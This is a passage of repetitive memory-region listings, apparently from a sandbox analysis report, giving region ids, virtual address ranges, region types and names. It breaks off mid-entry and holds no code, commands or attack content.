name = "pagefile_0x0000000000530000" filename = "" Region: id = 7831 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7832 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7833 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7834 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7835 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7836 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7837 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7838 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 7839 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 7840 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7841 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7842 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7843 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7844 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7845 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7846 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7847 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7848 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7849 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7850 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7851 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7852 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7853 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7854 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7855 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7856 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7857 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7858 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7859 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7860 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7861 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7862 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7863 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7864 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7865 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7866 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7867 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7868 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7869 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7870 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7871 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7872 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7873 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7874 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7875 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7876 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7877 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7878 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7879 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7880 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7881 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7882 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7883 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7884 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7885 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7886 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7887 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 7888 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 7889 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7890 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7891 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7892 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7893 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7894 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7895 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7896 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7897 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7898 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7899 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7900 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7901 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7902 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7903 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7904 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7905 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7906 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7907 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7908 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7909 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7910 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7911 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 7912 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 7913 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7914 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7915 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7916 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 7917 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 7918 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7919 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7920 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7921 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7922 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7923 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7924 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7925 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7926 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7927 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7928 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7929 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7930 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7931 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7932 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7933 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7934 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7935 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7936 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7937 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7938 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7939 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7940 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7941 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7942 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7943 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7944 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7945 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7946 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7947 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7948 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7949 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7950 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7951 start_va = 0x24b0000 end_va = 0x24b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024b0000" filename = "" Region: id = 7952 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7953 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7954 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7955 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7956 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7957 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7958 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7959 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7960 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7961 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7962 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7963 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7964 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7965 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7966 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7967 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7968 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7969 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7970 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7971 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7972 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7973 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7974 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7975 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7976 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7977 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 7978 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 7979 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7980 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7981 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7982 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7983 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7984 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7985 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7986 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7987 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7988 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7989 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7990 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7991 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7992 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7993 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7994 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7995 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7996 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7997 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7998 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7999 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8000 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8001 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8002 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8003 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8004 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8005 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8006 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8007 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8008 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8009 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8010 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8011 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8012 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8013 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8014 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8015 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8016 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8017 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8018 start_va = 0x530000 end_va = 